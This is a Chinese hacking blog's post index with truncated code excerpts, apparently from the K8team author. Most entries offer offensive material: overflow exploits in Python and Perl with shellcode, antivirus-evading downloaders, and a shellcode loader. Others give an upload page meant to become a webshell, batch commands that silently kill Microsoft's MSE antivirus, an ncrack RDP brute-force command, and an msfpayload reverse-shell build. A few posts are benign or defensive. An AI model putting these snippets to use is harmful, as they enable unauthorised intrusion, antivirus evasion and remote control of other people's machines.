- ▪
Delphi 执行DOS命令并返回结果 CMD远控等等常用
2013-12-30
- unit UnitCmdShell;interfaceuses Windows,SysUtils,Classes; K8执行DOS并返回结果function RunDosCommand(Command: string): string;implementation =================================================
- ▪
Aspx 页面接收文件流 改改就成支持上传任意文件的小
2013-12-30
- Aspx 页面接收文件流 改改就成支持上传任意文件的小马了upload2 aspxusing System;using System Collections Generic;using System IO;using System Text;using System Web;using System Web UI;using
- ▪
[小技巧]命令行下停用微软MSE杀软 无提示
2013-12-31
- 命令行下停用微软MSE杀软 无提示sc start MsMpSvcsc stop MsMpSvc 不能用服务停止 会有提示建一个bat 结束taskkill im MsMpEng exe ftaskkill im MpCmdRun exe f
- ▪
[溢出]python 看雪exploit_me_A overflow exploit
2013-12-30
- python exploit_me_A overflow exploit by k8team 注意 如果shellcode中 出现0x00 得加密后再(因为strcpy函数截断0x00) python 2 7 3import httplibconn = httplib HTTPConnection("127 0 0 1:8888
- ▪
[溢出]Perl 看雪exploit_me_A exploit by k8team
2013-12-30
- ! usr bin perl Perl exploit_me_A exploit by k8team Date: 20131018 Tested on: XPSP3if (scalar(@ARGV) != 2) { "Usage $0 host port n"; exit; }use IO::Socket::INET;my $JMPESP
- ▪
[溢出]delphi overflow demo delphi缓冲区溢出例
2013-12-30
- delphi overflow demo delphi缓冲区溢出例子 by K8拉登哥哥0x00 缓冲区溢出 并非使用C C++语言编写的程序才会导致实际上任何语言只要开发不当 都有可能产生溢出漏洞网上各种溢出教程书籍等 全都是讲C的
- ▪
[免杀]Delphi源码免杀之函数动态调用 实现免杀的下载
2013-12-30
- Delphi源码免杀之函数动态调用 实现免杀的下载者自己编译这份代码看看 过N多杀软 没什么技术含量只是发出来给不懂的人入入门 也防止有新人老是来问ShellApi,URLMon 单元 Delphi动态调用API函数procedure
- ▪
[免杀] Delphi 内嵌ASM获取kernel32.dll的模块句柄
2013-12-30
- XP Vista WIN7以及X86 X64 通吃function Kernel32Handle(): HMODULE;{$IFDEF CPUX64}asm mov rbx,$60 mov rax,[gs:rbx] peb mov rax,[rax+$18] LDR mov rax,[rax+$30] InLoadOrde
- ▪
[溢出]dephi ShellCode Loader XP SP3 CN
2013-12-30
- delphi7program ShellCodeLoader;constShellCodeSize = $00000069; 16进制 - 105ShellCode : Array[0 ShellCodeSize-1] of byte =( cmd shellcode 105 byte$55,$8B,$EC,$33,$C0,$50,$50,$50
- ▪
VC编译 超级纳米型下载者 仅832字节 连1K都不到
2013-01-10
- [原创]VC编译 超级纳米型下载者 仅832字节 连1K都不到这是几年前写的了 纯属挑战极限 用VC写一个超小的下载者当时我也录有教程发布 具体自己百度 挖以前的动画教程如此小的下载者杀软一扫就直接扫到特征了...
- ▪
ASP 获取 post 提交的内容并保存到指定文件
2012-12-29
- ASP 获取 post 提交的内容并保存到指定文件<%name=request("name")response.write nameset f=Server.CreateObject("scripting.filesystemobject")set ff=f.opentextfile(server.mappath(".")&"\k8getqq.tx...
- ▪
Python给指定端口发送超长字符串 溢出fuzzing
2012-12-29
- #Python给指定端口发送超长字符串 端口要打开要不然会出错#getimport httplibconn = httplib.HTTPConnection("192.168.1.15:7556")a = 'A'*4080conn.request("GET",a)别问我有啥用 那我还真和你说 可用...
- ▪
Python Socket通讯例子源码
2012-12-29
- #clietn.pyif __name__ == '__main__': import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('localhost', 7556)) import time time.sleep(2) ...
- ▪
C# 演奏月亮代表我的心
2012-12-29
- C# 演奏 月亮代表我的心欢迎喜欢音乐的人与我一起交流 //racket 定义节拍 const int one = 600;//一拍 const int half = 300;//半拍 const int four_one = 150;//1/4拍 const int onedot ...
- ▪
C# 文件监视器简单例子源码
2012-12-29
- C# 文件监视器简单例子源码private void btn_FileWatcher_Click(object sender, EventArgs e) { FileSystemWatcher k8watcher = new FileSystemWatcher(); k8watcher.Path = "d:\\K8team"; k8...
- ▪
ASP.NET采集例子 一个小的网页爬虫
2012-12-29
- [原创]ASP.NET采集例子百度搜索K8机器人抓取标题和链接改下网址和正则可以随便抓指定站或者加个多线程再加上相关漏洞测试就可以写个自动入侵网站的程序 下面仅仅是简单的例子using System;using System.Colle...
- ▪
对几款网络抓包工具的评测
2012-12-30
- 对几款网络抓包工具的评测 by 拉登哥哥最近在写个CMD远控 写着写着 想在服务端上做点手脚都知道杀软误报 特别是黑软大部分都报毒 但实际上是正常的对此可能部分人并不装杀软 基本上靠自己分析软件是否安全...
- ▪
BT5下 ncrack破解3389
2012-12-30
- BT5下 ncrack破解3389ncrack -vv -d7 CL=10 --user k8team -P pass.pwd ip:3389 //如果提示 找不到 /root/Desktop/pass.pwd 可能是-P选项打成了-p Linux 严格区分大小写ncrack -vv --user k8t...
- ▪
BT5 MSF FTP扫描
2012-12-30
- BT5 MSF FTP扫描use scanner/ftp/ftp_versionshow optionsset RHOSTS 192.168.1.45set THREADS 255run扫描FTP服务器是否允许你名登陆use auxiliary/scanner/ftp/anonymousset RHOSTS 192.168.1.0/24S...
- ▪
BT5免杀 msfpayload生成2进制文件并免杀
2012-12-30
- BT5免杀 msfpayload生成2进制文件并免杀1 生成二进制文件msfpayload windows/shell_reverse_tcp o 注意这个是字母o 不是数字 0root@K8team:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.15...
- ▪
VBS加密解密入门-之ASCII
2012-12-29
- VBS加密解密入门-之ASCII这都是以前玩VB时弄的 下面的代码(ASP / VB VBS 通用啊)当然实际上 其它语言也通用 只是可能函数名不一样而以明文 对应的 ASCII码CrAcK8 --- 67 114 65 99 75 56Dim my...
- ▪
ShellCode溢出入门 例子 完整源码
2012-12-29
- 这是刚进公司那几天研究的 照着自己以前买的黑防溢出的书弄的附上书和光盘里没有的代码 或我亲自修正的代码vul1.c#include <windows.h>#include <stdio.h>#include <stdlib.h>char mybuf[]="k8test";int ...
- ▪
ASP只允许指定IP访问网站管理后台 黑客有帐号密码也
2012-12-29
- 后台限制IP访问 只允许指定IP 访问后台 黑客有后台帐号密码也没用'下面的例子只允许127.0.0.1登陆后台 或者10.110.8.810.110.8.8 这个是管理员自己的远程IP'限制指定IP断 黑客就算得到后台密码 也无...
- ▪
ASP用户注册检测函数 (使用正则表达式)
2012-12-29
- ASP用户注册检测函数 (使用正则表达式)这是以前写网站时自己写的一个类用户注册时除了在前台用JS检测外真正入库时也是要检测的 因为安全问题假如你写网站只是在JS那里检测提交的数据不在后台再做最后把关的话 ...
- ▪
禁用wmiprvse.exe 让别人的PR无法提权
2012-12-30
- 禁止PR提权一 先来PR提权原理分析从源码入手其中部分源码如下 pr是通过搜索 wmiprvse.exe 取到SYSTEM权限后 执行任意命令执行添加用户命令当然就是添加用户了 方法1 加载 K8ShellNoExecExe.sys 这个可...
